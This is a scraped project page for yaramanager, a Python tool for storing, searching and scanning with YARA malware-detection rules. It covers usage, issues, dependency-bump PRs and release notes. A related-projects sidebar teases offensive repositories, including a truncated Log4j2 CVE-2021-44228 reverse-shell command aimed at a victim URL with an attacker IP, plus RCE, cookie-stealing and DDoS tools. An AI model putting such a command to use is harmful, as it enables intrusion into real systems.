Simple yara rule manager

Last update: Nov 17, 2022

Overview

Yara Manager

A simple program to manage your yara ruleset in a (sqlite) database.

Todos

Search rules and descriptions
Cluster rules in rulesets
Enforce configurable default set of meta fields
Implement backup and sharing possibilities

Installation

pip install yaramanager

Features

Asciinema (out of date)

Store your Yara rules in a DB locally and manage them.

Usage

$ ym
Usage: ym [OPTIONS] COMMAND [ARGS]...

Options:
  --help  Show this message and exit.

Commands:
  add      Add a new rule to the database.
  config   Review and change yaramanager configuration.
  db       Manage your databases
  del      Delete a rule by its ID or name.
  edit     Edits a rule with your default editor.
  export   Export rules from the database.
  get      Get rules from the database.
  help     Displays help about commands
  list     Lists rules available in DB.
  parse    Parses rule files.
  read     Read rules from stdin.
  scan     Scan files using your rulesets.
  search   Searches through your rules.
  stats    Prints stats about the database contents.
  tags     Show tags and the number of tagged rules
  version  Displays the current version.

Comments

Filter rules by tags - exclusion

Hello @3c7 - I wanted to apply some extra filtering conditions using a SQLAlchemy query, but didn't succeeded yet. Here is a question where i described most of the issue, and I was wondering if you may have a better idea maybe? Much appreciated. Thanks

opened by silvian-io 4
nocase error

If a rule has nocase like:

strings: $x00 = "test" ascii wide nocase

results in below is saved to db: $x00 = "test" ascii wide

You lose nocase

opened by mrJingl3s 1
Bump mako from 1.1.6 to 1.2.2
Bumps mako from 1.1.6 to 1.2.2.

Release notes

Sourced from mako's releases.

1.2.2

Released: Mon Aug 29 2022

bug

[bug] [lexer] Fixed issue in lexer where the regexp used to match tags would not correctly interpret quoted sections individually. While this parsing issue still produced the same expected tag structure later on, the mis-handling of quoted sections was also subject to a regexp crash if a tag had a large number of quotes within its quoted sections.

References: #366

1.2.1

Released: Thu Jun 30 2022

bug

[bug] [tests] Various fixes to the test suite in the area of exception message rendering to accommodate for variability in Python versions as well as Pygments.

References: #360

misc

[performance] Optimized some codepaths within the lexer/Python code generation process, improving performance for generation of templates prior to their being cached. Pull request courtesy Takuto Ikuta.

References: #361

1.2.0

Released: Thu Mar 10 2022

changed

[changed] [py3k] Corrected "universal wheel" directive in setup.cfg so that building a wheel does not target Python 2.

References: #351

[changed] [py3k] The bytestring_passthrough template argument is removed, as this flag only applied to Python 2.

... (truncated)

Commits

See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

@dependabot use these labels will set the current labels as the default for future PRs for this repo and language

@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language

@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language

@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies
opened by dependabot[bot] 1
Bump setuptools from 65.5.0 to 65.5.1
Bumps setuptools from 65.5.0 to 65.5.1.

Changelog

Sourced from setuptools's changelog.

v65.5.1

Misc ^^^^

#3638: Drop a test dependency on the mock package, always use :external+python:py:mod:unittest.mock -- by :user:hroncok

#3659: Fixed REDoS vector in package_index.

Commits

a462cb5 Bump version: 65.5.0 → 65.5.1

de35d8b Merge pull request #3656 from bmorris3/typos

58e23de Update changelog. Ref #3659.

43a9c9b Limit the amount of whitespace to search/backtrack. Fixes #3659.

5791343 Add test capturing failed expectation. Ref #3659.

1f97905 ⚫ Fade to black.

6254567 Remove workaround for emacs.

729b180 ⚫ Fade to black.

c068081 Typo corrections

f777a40 Suppress deprecation warning in --rsyncdir. Workaround for #3655.

Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

@dependabot use these labels will set the current labels as the default for future PRs for this repo and language

@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language

@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language

@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies
opened by dependabot[bot] 0
Bump certifi from 2022.9.24 to 2022.12.7
Bumps certifi from 2022.9.24 to 2022.12.7.

Commits

9e9e840 2022.12.07

See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

@dependabot use these labels will set the current labels as the default for future PRs for this repo and language

@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language

@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language

@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies
opened by dependabot[bot] 0

Releases(v0.2.1)

v0.2.1(Nov 2, 2022)

Source code(tar.gz)
Source code(zip)
yaramanager-0.2.1-py3-none-any.whl(37.59 KB)
yaramanager-0.2.1.tar.gz(25.41 KB)
yaramanager-v0.2.1-linux.zip(24.82 MB)
yaramanager-v0.2.1-macos.zip(12.04 MB)
yaramanager-v0.2.1-windows.zip(13.87 MB)
v0.2.0(Nov 2, 2022)
Release for DB update

Adding missing string modifiers

Updating dependencies

Source code(tar.gz)
Source code(zip)
yaramanager-0.2.0-py3-none-any.whl(37.59 KB)
yaramanager-0.2.0.tar.gz(25.41 KB)
yaramanager-v0.2.0-linux.zip(24.82 MB)
yaramanager-v0.2.0-macos.zip(12.04 MB)
yaramanager-v0.2.0-windows.zip(13.87 MB)
v0.2.0-rc1(Feb 21, 2022)

This release introduces a change in the DB schema. It's possible now to use MySQL/MariaDB and Postgres as database.
Source code(tar.gz)
Source code(zip)
yaramanager-0.2.0rc1-py3-none-any.whl(37.55 KB)
yaramanager-0.2.0rc1.tar.gz(25.78 KB)
yaramanager-v0.2.0-rc1-linux.zip(23.21 MB)
yaramanager-v0.2.0-rc1-macos.zip(11.77 MB)
yaramanager-v0.2.0-rc1-windows.zip(13.34 MB)
v0.1.16(Feb 21, 2022)
Updated dependencies

Added externals parameter to yara-python calls, so the filename parameter can be used within yara rules

Added --ruleset, -R switch to the add command, so multiple rules within a rule file will be added to a ruleset, based on the filename of the given rule file

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.16-py3-none-any.whl(36.65 KB)
yaramanager-0.1.16.tar.gz(24.88 KB)
yaramanager-v0.1.16-linux.zip(23.21 MB)
yaramanager-v0.1.16-macos.zip(11.77 MB)
yaramanager-v0.1.16-windows.zip(13.34 MB)
v0.1.15(Oct 11, 2021)
Filter for and exclude multiple tags via export, list and scan command using parameters -t/--tag and -T/--exclude-tag

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.15-py3-none-any.whl(36.25 KB)
yaramanager-0.1.15.tar.gz(24.50 KB)
yaramanager-v0.1.15-linux.zip(23.09 MB)
yaramanager-v0.1.15-macos.zip(11.54 MB)
yaramanager-v0.1.15-windows.zip(13.25 MB)
v0.1.14(Oct 5, 2021)
Added export functionality for rulesets (@slv008)

Refactored general rule export functionality into a YaraBuilder subclass

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.14-py3-none-any.whl(35.98 KB)
yaramanager-0.1.14.tar.gz(24.35 KB)
v0.1.13(Oct 3, 2021)
Added compiled export functionality: ym export -sc test.yar

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.13-py3-none-any.whl(35.08 KB)
yaramanager-0.1.13.tar.gz(23.83 KB)
0.1.12(Jun 12, 2021)
Implemented recursive scans via
$ ym scan -r /path/to/dir

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.12-linux.zip(21.74 MB)
yaramanager-0.1.12-macos.zip(11.52 MB)
yaramanager-0.1.12-py3-none-any.whl(34.92 KB)
yaramanager-0.1.12-windows.zip(13.21 MB)
yaramanager-0.1.12.tar.gz(23.74 KB)
0.1.11(Apr 29, 2021)
Updated yarabuilder and yara-python

Fixes commit hash display for packaged yaramanager

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.11-linux.zip(21.72 MB)
yaramanager-0.1.11-macos.zip(11.50 MB)
yaramanager-0.1.11-py3-none-any.whl(34.74 KB)
yaramanager-0.1.11-windows.zip(13.19 MB)
yaramanager-0.1.11.tar.gz(23.55 KB)
0.1.10(Apr 9, 2021)
Added prebuilt binaries using Github Actions - I'm new to this, so handle with care.

Added new command to create new rules directly with ym.

Prebuilt binaries include commit hash

Updated readme

Added YM_PATH and YM_CONFIG env variables to overwrite general path and config path.

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.10-linux.zip(21.61 MB)
yaramanager-0.1.10-macos.zip(11.48 MB)
yaramanager-0.1.10-py3-none-any.whl(34.73 KB)
yaramanager-0.1.10-windows.zip(12.29 MB)
yaramanager-0.1.10.tar.gz(23.51 KB)
0.1.8(Apr 5, 2021)
Added debug output for some commands

Platform specific paths (Linux, MacOS, Win)

Added Rulesets (ym ruleset, which meta attribute is responsible for assigning rules to a ruleset is configurable)

Fixed alembic migrations, some files were incorrectly added to pyproject file.

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.8-py3-none-any.whl(32.58 KB)
yaramanager-0.1.8.tar.gz(21.05 KB)
0.1.6(Apr 1, 2021)
--ensure/-e switch ensures specific meta fields and tags in list command. These can be configured:

[yaramanager.ensure] ensure_meta = [ "author", "tlp", "description" ] ensure_tag = true

Added search rule command which searches through rule names and description meta fields

Fixes rule editing: because of a misunderstanding of how SQLAlchemy handles new objects with relations, editing rules could lead to exceptions

Fixes custom editor usage: previously the custom editor was only applied to config edits, but not to rule edits

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.6-py3-none-any.whl(25.45 KB)
yaramanager-0.1.6.tar.gz(18.52 KB)
0.1.5(Mar 30, 2021)
Implemented alembic migrations via db upgrade command

Removed db init command

Added Scan capability

New help command

Some refactoring :)

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.5-py3-none-any.whl(24.70 KB)
yaramanager-0.1.5.tar.gz(17.74 KB)
0.1.4(Mar 29, 2021)
Fixed bug that prevented edit rule tags and crashed the edit process

Added tags command

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.4-py3-none-any.whl(21.39 KB)
yaramanager-0.1.4.tar.gz(13.25 KB)
0.1.3(Mar 28, 2021)
Added export command

Customize meta fields in table outputs (list command) - needs config update, e.g.:

[yaramanager.meta] # ColumnTitle = metafield Author = "author" TLP = "tlp" Created = "created" Modified = "modified" # ...

Added optional version check to version command via -c switch

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.3-py3-none-any.whl(20.65 KB)
yaramanager-0.1.3.tar.gz(12.98 KB)
0.1.2(Mar 27, 2021)
Fixes bug which resulted in unnecessarily nested config

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.2-py3-none-any.whl(19.32 KB)
yaramanager-0.1.2.tar.gz(12.24 KB)
0.1.1(Mar 27, 2021)
Updated yarabuilder to v0.0.5

Added get command for retrieving single rules from the database

Added read command for adding rules via stdin

Read and update rules modified by edit command

Added version command

Source code(tar.gz)
Source code(zip)
yaramanager-0.1.1-py3-none-any.whl(19.30 KB)
yaramanager-0.1.1.tar.gz(12.20 KB)
0.1.0(Mar 27, 2021)

Initial release
Source code(tar.gz)
Source code(zip)
yaramanager-0.1.0-py3-none-any.whl(17.62 KB)
yaramanager-0.1.0.tar.gz(11.40 KB)

Owner

Nils Kuhnert

TI, RE, DFIR stuff. Everything you find on this profile is the reason why I'm not a developer.

GitHub Repository

A script to extract SNESticle from Fight Night Round 2

fn22snesticle.py A script for producing a SNESticle ISO from a Fight Night Round 2 ISO and any SNES ROM. Background Fight Night Round 2 is a boxing ga

57 Nov 22, 2022

Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

16 Mar 24, 2022

SeaSurf is a Flask extension for preventing cross-site request forgery (CSRF).

Flask-SeaSurf SeaSurf is a Flask extension for preventing cross-site request forgery (CSRF). CSRF vulnerabilities have been found in large and popular

183 Dec 28, 2022

Python program that generates secure passwords.

Python program that generates secure passwords. The user has the option to select the length of the password, amount of passwords,

4 Dec 07, 2021

Complet and easy to run Port Scanner with Python

Port_Scanner Complet and easy to run Port Scanner with Python Installation 1- git clone https://github.com/s120000/Port_Scanner 2- cd Port_Scanner 3-

1 May 19, 2022

Having a weak password is not good for a system that demands high confidentiality and security of user credentials

Having a weak password is not good for a system that demands high confidentiality and security of user credentials. It turns out that people find it difficult to make up a strong password that is str

0 Feb 07, 2022

Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.

The Recon-ng Framework Recon-ng content now available on Pluralsight! Recon-ng is a full-featured reconnaissance framework designed with the goal of p

2.4k Jan 07, 2023

A burp-suite plugin that extract all parameter names from in-scope requests

ParamsExtractor A burp-suite plugin that extract all parameters name from in-scope requests. You can run the plugin while you are working on the targe

29 Nov 09, 2022

Port scanner tool with easy installation

ort scanner tool with easy installation! Python programming language is used and The text in the program is Georgian 3

2 Mar 24, 2022

A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.

A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regardin

39 Dec 10, 2022

Directory Traversal in Afterlogic webmail aurora and pro

CVE-2021-26294 Exploit Directory Traversal in Afterlogic webmail aurora and pro . Description: AfterLogic Aurora and WebMail Pro products with 7.7.9 a

8 Nov 09, 2022

CVE-2021-22986 & F5 BIG-IP RCE

Vuln Impact This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management

85 Dec 02, 2022

Tenssens framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources.

31 Oct 21, 2022

Simple yara rule manager

Related tags

Overview

Yara Manager

Todos

Installation

Features

Asciinema (out of date)

Usage

Comments

Filter rules by tags - exclusion

nocase error

Bump mako from 1.1.6 to 1.2.2

1.2.2

bug

1.2.1

bug

misc

1.2.0

changed

Bump setuptools from 65.5.0 to 65.5.1

v65.5.1

Bump certifi from 2022.9.24 to 2022.12.7

Releases(v0.2.1)

v0.2.1(Nov 2, 2022)

v0.2.0(Nov 2, 2022)

v0.2.0-rc1(Feb 21, 2022)

v0.1.16(Feb 21, 2022)

v0.1.15(Oct 11, 2021)

v0.1.14(Oct 5, 2021)

v0.1.13(Oct 3, 2021)

0.1.12(Jun 12, 2021)

0.1.11(Apr 29, 2021)

0.1.10(Apr 9, 2021)

0.1.8(Apr 5, 2021)

0.1.6(Apr 1, 2021)

0.1.5(Mar 30, 2021)

0.1.4(Mar 29, 2021)

0.1.3(Mar 28, 2021)

0.1.2(Mar 27, 2021)

0.1.1(Mar 27, 2021)

0.1.0(Mar 27, 2021)

Owner

Nils Kuhnert

A script to extract SNESticle from Fight Night Round 2

Log4j2 CVE-2021-44228 revshell

SeaSurf is a Flask extension for preventing cross-site request forgery (CSRF).

Python program that generates secure passwords.

Complet and easy to run Port Scanner with Python

Having a weak password is not good for a system that demands high confidentiality and security of user credentials

Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.

A burp-suite plugin that extract all parameter names from in-scope requests

Port scanner tool with easy installation

A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.

Directory Traversal in Afterlogic webmail aurora and pro

CVE-2021-22986 & F5 BIG-IP RCE

Tenssens framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources.

Big-Papa Integrates Javascript and python for remote cookie stealing which then can be used for session hijacking

Burp Suite extension for encoding/decoding EVM calldata

🔍 IRIS: An open-source intelligence framework

Hammer-DDos - Hammer DDos With Python

TightVNC Vulnerability.

A knockoff social-engineer toolkit

Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)